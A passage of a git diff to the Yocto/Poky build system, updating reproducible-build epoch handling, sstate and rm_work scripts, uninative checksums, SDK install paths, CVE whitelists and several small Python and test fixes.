exported in the SOURCE_DATE_EPOCH variable. -# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...) +# Once the value is determined, it is stored in the recipe's SDE_FILE. BUILD_REPRODUCIBLE_BINARIES ??= '1' -inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')} +inherit reproducible_build_simple SDE_DIR = "${WORKDIR}/source-date-epoch" SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt" @@ -77,49 +94,47 @@ python create_source_date_epoch_stamp() { import oe.reproducible epochfile = d.getVar('SDE_FILE') - # If it exists we need to regenerate as the sources may have changed - if os.path.isfile(epochfile): - bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile) - os.remove(epochfile) + tmp_file = "%s.new" % epochfile source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S')) bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) bb.utils.mkdirhier(d.getVar('SDE_DIR')) - with open(epochfile, 'w') as f: + with open(tmp_file, 'w') as f: f.write(str(source_date_epoch)) + + os.rename(tmp_file, epochfile) } +EPOCHTASK = "do_deploy_source_date_epoch" + +# Generate the stamp after do_unpack runs +do_unpack[postfuncs] += "create_source_date_epoch_stamp" + def get_source_date_epoch_value(d): - cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH') - if cached: + epochfile = d.getVar('SDE_FILE') + cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None) + if cached and efile == epochfile: return cached - epochfile = d.getVar('SDE_FILE') + if cached and epochfile != efile: + bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile)) + source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) - if os.path.isfile(epochfile): + try: with open(epochfile, 'r') as f: s = f.read() try: source_date_epoch = int(s) - # workaround for old sstate with SDE_FILE content being 0 - use SOURCE_DATE_EPOCH_FALLBACK - if source_date_epoch == 0 : - source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) - bb.warn("SOURCE_DATE_EPOCH value from sstate '%s' is deprecated/invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK '%s'" % (s, source_date_epoch)) except ValueError: bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s) source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) - else: + except FileNotFoundError: bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch)) - d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch)) + d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile)) return str(source_date_epoch) export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}" BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH" - -python () { - if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1': - d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp") -} diff --git a/poky/meta/classes/rm_work.bbclass b/poky/meta/classes/rm_work.bbclass index 01c2ab1c78..2d5a56c238 100644 --- a/poky/meta/classes/rm_work.bbclass +++ b/poky/meta/classes/rm_work.bbclass @@ -73,7 +73,7 @@ do_rm_work () { # sstate version since otherwise we'd need to leave 'plaindirs' around # such as 'packages' and 'packages-split' and these can be large. No end # of chain tasks depend directly on do_package anymore. - rm -f $i; + rm -f -- $i; ;; *_setscene*) # Skip stamps which are already setscene versions @@ -90,7 +90,7 @@ do_rm_work () { ;; esac done - rm -f $i + rm -f -- $i esac done @@ -100,9 +100,9 @@ do_rm_work () { # Retain only logs and other files in temp, safely ignore # failures of removing pseudo folers on NFS2/3 server. if [ $dir = 'pseudo' ]; then - rm -rf $dir 2> /dev/null || true + rm -rf -- $dir 2> /dev/null || true elif ! echo "$excludes" | grep -q -w "$dir"; then - rm -rf $dir + rm -rf -- $dir fi done } diff --git a/poky/meta/classes/sstate.bbclass b/poky/meta/classes/sstate.bbclass index 2ff0d6850c..c2720cde92 100644 --- a/poky/meta/classes/sstate.bbclass +++ b/poky/meta/classes/sstate.bbclass @@ -640,10 +640,21 @@ python sstate_hardcode_path () { def sstate_package(ss, d): import oe.path + import time tmpdir = d.getVar('TMPDIR') + fixtime = False + if ss['task'] == "package": + fixtime = True + + def fixtimestamp(root, path): + f = os.path.join(root, path) + if os.lstat(f).st_mtime > sde: + os.utime(f, (sde, sde), follow_symlinks=False) + sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task']) + sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time()) d.setVar("SSTATE_CURRTASK", ss['task']) bb.utils.remove(sstatebuild, recurse=True) bb.utils.mkdirhier(sstatebuild) @@ -656,6 +667,8 @@ def sstate_package(ss, d): # to sstate tasks but there aren't many of these so better just avoid them entirely. for walkroot, dirs, files in os.walk(state[1]): for file in files + dirs: + if fixtime: + fixtimestamp(walkroot, file) srcpath = os.path.join(walkroot, file) if not os.path.islink(srcpath): continue @@ -677,6 +690,11 @@ def sstate_package(ss, d): bb.utils.mkdirhier(plain) bb.utils.mkdirhier(pdir) os.rename(plain, pdir) + if fixtime: + fixtimestamp(pdir, "") + for walkroot, dirs, files in os.walk(pdir): + for file in files + dirs: + fixtimestamp(walkroot, file) d.setVar('SSTATE_BUILDDIR', sstatebuild) d.setVar('SSTATE_INSTDIR', sstatebuild) @@ -796,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}" sstate_create_package () { # Exit early if it already exists if [ -e ${SSTATE_PKG} ]; then - [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} + touch ${SSTATE_PKG} 2>/dev/null || true return fi @@ -830,7 +848,7 @@ sstate_create_package () { else rm $TFILE fi - [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} + touch ${SSTATE_PKG} 2>/dev/null || true } python sstate_sign_package () { @@ -859,12 +877,12 @@ python sstate_report_unihash() { # sstate_unpack_package () { tar -xvzf ${SSTATE_PKG} - # update .siginfo atime on local/NFS mirror - [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo - # Use "! -w ||" to return true for read only files - [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG} - [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig - [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo + # update .siginfo atime on local/NFS mirror if it is a symbolic link + [ ! -h ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true + # update each symbolic link instead of any referenced file + touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true + [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true + [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true } BB_HASHCHECK_FUNCTION = "sstate_checkhashes" @@ -950,10 +968,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True, found.add(tid) if tid in missed: missed.remove(tid) - except: + except bb.fetch2.FetchError as e: missed.add(tid) - bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri) - pass + bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e)) + except Exception as e: + bb.error("SState: cannot test %s: %s" % (srcuri, e)) if len(tasklist) >= min_tasks: bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d) @@ -1041,6 +1060,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None): if taskdependees[task][1] == "do_populate_lic": return True + # We only need to trigger deploy_source_date_epoch through direct dependencies + if taskdependees[task][1] == "do_deploy_source_date_epoch": + return True + # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir": return True diff --git a/poky/meta/classes/testimage.bbclass b/poky/meta/classes/testimage.bbclass index c709384b91..b1aef626f7 100644 --- a/poky/meta/classes/testimage.bbclass +++ b/poky/meta/classes/testimage.bbclass @@ -193,6 +193,7 @@ def testimage_main(d): import json import signal import logging + import shutil from bb.utils import export_proxies from oeqa.core.utils.misc import updateTestData @@ -228,9 +229,10 @@ def testimage_main(d): tdname = "%s.testdata.json" % image_name try: - td = json.load(open(tdname, "r")) - except (FileNotFoundError) as err: - bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname) + with open(tdname, "r") as f: + td = json.load(f) + except FileNotFoundError as err: + bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err)) # Some variables need to be updates (mostly paths) with the # ones of the current environment because some tests require them. @@ -397,10 +399,17 @@ def testimage_main(d): get_testimage_result_id(configuration), dump_streams=d.getVar('TESTREPORT_FULLLOGS')) results.logSummary(pn) + + # Copy additional logs to tmp/log/oeqa so it's easier to find them + targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN")) + os.makedirs(targetdir, exist_ok=True) + os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog))) + os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME')))) + if not results or not complete: - bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True) + bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True) if not results.wasSuccessful(): - bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True) + bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True) def get_runtime_paths(d): """ diff --git a/poky/meta/classes/uninative.bbclass b/poky/meta/classes/uninative.bbclass index 1e19917a97..3c7ccd66f4 100644 --- a/poky/meta/classes/uninative.bbclass +++ b/poky/meta/classes/uninative.bbclass @@ -100,7 +100,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \ ${UNINATIVE_LOADER} \ ${UNINATIVE_LOADER} \ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \ - ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum) + ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum) subprocess.check_output(cmd, shell=True) with open(loaderchksum, "w") as f: diff --git a/poky/meta/classes/useradd.bbclass b/poky/meta/classes/useradd.bbclass index e5f3ba24f9..0f0ed3446d 100644 --- a/poky/meta/classes/useradd.bbclass +++ b/poky/meta/classes/useradd.bbclass @@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () { preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd') preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems') preinst += d.getVar('useradd_preinst') + # Expand out the *_PARAM variables to the package specific versions + for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]: + val = d.getVar(rep + "_" + pkg) or "" + preinst = preinst.replace("${" + rep + "}", val) d.setVar('pkg_preinst_%s' % pkg, preinst) # RDEPENDS setup diff --git a/poky/meta/classes/utils.bbclass b/poky/meta/classes/utils.bbclass index cd3d05709e..99f68f7505 100644 --- a/poky/meta/classes/utils.bbclass +++ b/poky/meta/classes/utils.bbclass @@ -233,7 +233,7 @@ create_cmdline_wrapper () { #!/bin/bash realpath=\`readlink -fn \$0\` realdir=\`dirname \$realpath\` -exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@" +exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@" END chmod +x $cmd } diff --git a/poky/meta/conf/bitbake.conf b/poky/meta/conf/bitbake.conf index 0141919021..91f003d6dd 100644 --- a/poky/meta/conf/bitbake.conf +++ b/poky/meta/conf/bitbake.conf @@ -421,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}" SDK_NAME_PREFIX ?= "oecore" SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}" -SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" +SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath" SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}" +# The path to default to installing the SDK to +SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" ################################################################## # Kernel info. @@ -500,7 +502,7 @@ HOSTTOOLS += " \ HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}" # Link to these if present -HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo" +HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo" # Temporary add few more detected in bitbake world HOSTTOOLS_NONFATAL += "join nl size yes zcat" diff --git a/poky/meta/conf/distro/include/cve-extra-exclusions.inc b/poky/meta/conf/distro/include/cve-extra-exclusions.inc index cf07acce1d..e02a4d1fde 100644 --- a/poky/meta/conf/distro/include/cve-extra-exclusions.inc +++ b/poky/meta/conf/distro/include/cve-extra-exclusions.inc @@ -44,7 +44,14 @@ CVE_CHECK_WHITELIST += "CVE-2010-4756" # exposing this interface in an exploitable way CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511" - +# db +# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with +# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed. +CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \ +CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \ +CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \ +CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \ +CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981" #### CPE update pending #### @@ -61,10 +68,6 @@ CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511" # There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html # however qemu maintainers are sure the patch is incorrect and should not be applied. -# flex:flex-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6293 -# Upstream bug, still open: https://github.com/westes/flex/issues/414 -# Causes memory exhaustion so potential DoS but no buffer overflow, low priority - # wget https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31879 # https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html # No response upstream as of 2021/5/12 diff --git a/poky/meta/conf/distro/include/default-distrovars.inc b/poky/meta/conf/distro/include/default-distrovars.inc index 433d4b6651..0240589c81 100644 --- a/poky/meta/conf/distro/include/default-distrovars.inc +++ b/poky/meta/conf/distro/include/default-distrovars.inc @@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}" # The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully # fetch from the network (and warn you if not). To disable the test set # the variable to be empty. -# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master +# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/" diff --git a/poky/meta/conf/distro/include/maintainers.inc b/poky/meta/conf/distro/include/maintainers.inc index ef1e7fe2f4..1575fce8c7 100644 --- a/poky/meta/conf/distro/include/maintainers.inc +++ b/poky/meta/conf/distro/include/maintainers.inc @@ -4,7 +4,7 @@ # # Please submit any patches against recipes in meta to the # OE-Core mail list (openembedded-core@lists.openembedded.org) -# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org) +# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org) # # If you have problems with or questions about a particular recipe, feel # free to contact the maintainer directly (cc:ing the appropriate mailing list @@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" +RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>" RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>" RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>" RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" diff --git a/poky/meta/conf/distro/include/yocto-uninative.inc b/poky/meta/conf/distro/include/yocto-uninative.inc index 740cca0ecf..3165fc93b8 100644 --- a/poky/meta/conf/distro/include/yocto-uninative.inc +++ b/poky/meta/conf/distro/include/yocto-uninative.inc @@ -6,9 +6,9 @@ # to the distro running on the build machine. # -UNINATIVE_MAXGLIBCVERSION = "2.33" +UNINATIVE_MAXGLIBCVERSION = "2.34" -UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.2/" -UNINATIVE_CHECKSUM[aarch64] ?= "4f0872cdca2775b637a8a99815ca5c8dd42146abe903a24a50ee0448358c764b" -UNINATIVE_CHECKSUM[i686] ?= "e2eeab92e67263db37d9bb6d4c58579abd1f47ff4cded3171bde572fece124b2" -UNINATIVE_CHECKSUM[x86_64] ?= "3ee8c7d55e2d4c7ae3887cddb97219f97b94efddfeee2e24923c0cb0e8ce84c6" +UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.4/" +UNINATIVE_CHECKSUM[aarch64] ?= "3013cdda8f0dc6639ce1c80f33eabce66f06b890bd5b58739a6d7a92a0bb7100" +UNINATIVE_CHECKSUM[i686] ?= "abed500de584aad63ec237546db20cdd0c69d8870a6f8e94ac31721ace64b376" +UNINATIVE_CHECKSUM[x86_64] ?= "126f4f7f6f21084ee140dac3eb4c536b963837826b7c38599db0b512c3377ba2" diff --git a/poky/meta/conf/layer.conf b/poky/meta/conf/layer.conf index 1c432275be..7453655417 100644 --- a/poky/meta/conf/layer.conf +++ b/poky/meta/conf/layer.conf @@ -102,4 +102,4 @@ SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native" # We need to keep bitbake tools in PATH # Avoid empty path entries BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}" -PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' is not '' else ''}${HOSTTOOLS_DIR}" +PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}" diff --git a/poky/meta/conf/multilib.conf b/poky/meta/conf/multilib.conf index d231107f8b..e9767c73b6 100644 --- a/poky/meta/conf/multilib.conf +++ b/poky/meta/conf/multilib.conf @@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot" RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot" RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot" +PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot" + INHERIT += "multilib_global" BBCLASSEXTEND_append = " ${MULTILIBS}" diff --git a/poky/meta/files/common-licenses/Unlicense b/poky/meta/files/common-licenses/Unlicense new file mode 100644 index 0000000000..68a49daad8 --- /dev/null +++ b/poky/meta/files/common-licenses/Unlicense @@ -0,0 +1,24 @@ +This is free and unencumbered software released into the public domain. + +Anyone is free to copy, modify, publish, use, compile, sell, or +distribute this software, either in source code form or as a compiled +binary, for any purpose, commercial or non-commercial, and by any +means. + +In jurisdictions that recognize copyright laws, the author or authors +of this software dedicate any and all copyright interest in the +software to the public domain. We make this dedication for the benefit +of the public at large and to the detriment of our heirs and +successors. We intend this dedication to be an overt act of +relinquishment in perpetuity of all present and future rights to this +software under copyright law. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR +OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, +ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +OTHER DEALINGS IN THE SOFTWARE. + +For more information, please refer to <http://unlicense.org/> diff --git a/poky/meta/files/toolchain-shar-extract.sh b/poky/meta/files/toolchain-shar-extract.sh index dd9342758b..4386b985bb 100644 --- a/poky/meta/files/toolchain-shar-extract.sh +++ b/poky/meta/files/toolchain-shar-extract.sh @@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then exit 1 fi -DEFAULT_INSTALL_DIR="@SDKPATH@" +SDK_BUILD_PATH="@SDKPATH@" +DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@" SUDO_EXEC="" EXTRA_TAR_OPTIONS="" target_sdk_dir="" diff --git a/poky/meta/files/toolchain-shar-relocate.sh b/poky/meta/files/toolchain-shar-relocate.sh index ba873373e2..3ece04db0a 100644 --- a/poky/meta/files/toolchain-shar-relocate.sh +++ b/poky/meta/files/toolchain-shar-relocate.sh @@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \ -e "$target_sdk_dir/post-relocate-setup" \ -e "$target_sdk_dir/${0##*/}" | \ xargs -n100 $SUDO_EXEC sed -i \ - -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \ + -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \ -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \ -e "s: /usr/bin/perl: /usr/bin/env perl:g" diff --git a/poky/meta/lib/buildstats.py b/poky/meta/lib/buildstats.py index 8627ed3c31..c52b6c3b72 100644 --- a/poky/meta/lib/buildstats.py +++ b/poky/meta/lib/buildstats.py @@ -43,8 +43,8 @@ class SystemStats: # depends on the heartbeat event, which fires less often. self.min_seconds = 1 - self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') - self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') + self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') + self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') self.diskstats_ltime = None self.diskstats_data = None self.stat_ltimes = None diff --git a/poky/meta/lib/oe/license.py b/poky/meta/lib/oe/license.py index c1274a61de..c4efbe142b 100644 --- a/poky/meta/lib/oe/license.py +++ b/poky/meta/lib/oe/license.py @@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor): def visit_Str(self, node): self.licenses.append(node.s) + def visit_Constant(self, node): + self.licenses.append(node.value) + def visit_BinOp(self, node): if isinstance(node.op, ast.BitOr): left = FlattenVisitor(self.choose_licenses) @@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor): def visit_Str(self, node): self.licenses.add(node.s) + def visit_Constant(self, node): + self.licenses.add(node.value) + def list_licenses(licensestr): """Simply get a list of all licenses mentioned in a license string. Binary operators are not applied or taken into account in any way""" diff --git a/poky/meta/lib/oe/reproducible.py b/poky/meta/lib/oe/reproducible.py index 204b9bd734..0938e4cb39 100644 --- a/poky/meta/lib/oe/reproducible.py +++ b/poky/meta/lib/oe/reproducible.py @@ -41,7 +41,7 @@ def find_git_folder(d, sourcedir): for root, dirs, files in os.walk(workdir, topdown=True): dirs[:] = [d for d in dirs if d not in exclude] if '.git' in dirs: - return root + return os.path.join(root, ".git") bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir) return None diff --git a/poky/meta/lib/oe/utils.py b/poky/meta/lib/oe/utils.py index 83d298906b..3e016244c5 100644 --- a/poky/meta/lib/oe/utils.py +++ b/poky/meta/lib/oe/utils.py @@ -481,7 +481,8 @@ class ThreadedWorker(Thread): try: func(self, *args, **kargs) except Exception as e: - print(e) + # Eat all exceptions + bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e) finally: self.tasks.task_done() diff --git a/poky/meta/lib/oeqa/core/target/ssh.py b/poky/meta/lib/oeqa/core/target/ssh.py index aefb576805..af4a67f266 100644 --- a/poky/meta/lib/oeqa/core/target/ssh.py +++ b/poky/meta/lib/oeqa/core/target/ssh.py @@ -34,6 +34,7 @@ class OESSHTarget(OETarget): self.timeout = timeout self.user = user ssh_options = [ + '-o', 'HostKeyAlgorithms=+ssh-rsa', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'StrictHostKeyChecking=no', '-o', 'LogLevel=ERROR' diff --git a/poky/meta/lib/oeqa/manual/eclipse-plugin.json b/poky/meta/lib/oeqa/manual/eclipse-plugin.json index d77d0e673b..6c110d0656 100644 --- a/poky/meta/lib/oeqa/manual/eclipse-plugin.json +++ b/poky/meta/lib/oeqa/manual/eclipse-plugin.json @@ -44,7 +44,7 @@ "expected_results": "" }, "2": { - "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", + "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", "expected_results": " Qemu can be lauched normally." }, "3": { @@ -60,7 +60,7 @@ "expected_results": "" }, "6": { - "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", + "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", "expected_results": "" }, "7": { @@ -247,7 +247,7 @@ "execution": { "1": { "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n", - "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" + "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" }, "2": { "action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n", diff --git a/poky/meta/lib/oeqa/runtime/cases/ksample.py b/poky/meta/lib/oeqa/runtime/cases/ksample.py index a9a1620ebd..9883aa9aa8 100644 --- a/poky/meta/lib/oeqa/runtime/cases/ksample.py +++ b/poky/meta/lib/oeqa/runtime/cases/ksample.py @@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends from oeqa.core.decorator.data import skipIfNotFeature # need some kernel fragments -# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf +# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf class KSample(OERuntimeTestCase): def cmd_and_check(self, cmd='', match_string=''): status, output = self.target.run(cmd) diff --git a/poky/meta/lib/oeqa/runtime/cases/parselogs.py b/poky/meta/lib/oeqa/runtime/cases/parselogs.py 